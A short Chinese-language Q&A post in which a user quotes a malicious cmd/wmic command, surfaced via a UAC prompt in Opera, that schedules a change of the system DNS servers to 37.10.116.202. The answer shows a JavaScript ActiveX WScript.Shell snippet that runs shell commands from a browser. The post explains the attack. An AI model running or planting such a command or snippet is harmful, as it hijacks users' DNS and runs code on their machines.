浏览器如何执行cmd中的命令?

浏览器如何执行cmd中的命令?

前段时间,当我使用 Opera 12.12 访问某个网站时,屏幕上出现了 Windows 7 UAC 提示:

C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")

显然,我拒绝了。

网络钓鱼者试图获取我的数据的方法非常清楚,但是他们是如何设法从浏览器执行命令的呢?

答案1

网络钓鱼者可能会使用如下 JavaScript:

var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);

仅当您关闭浏览器中需要使用 ActiveX 的安全功能时它才会起作用。

相关内容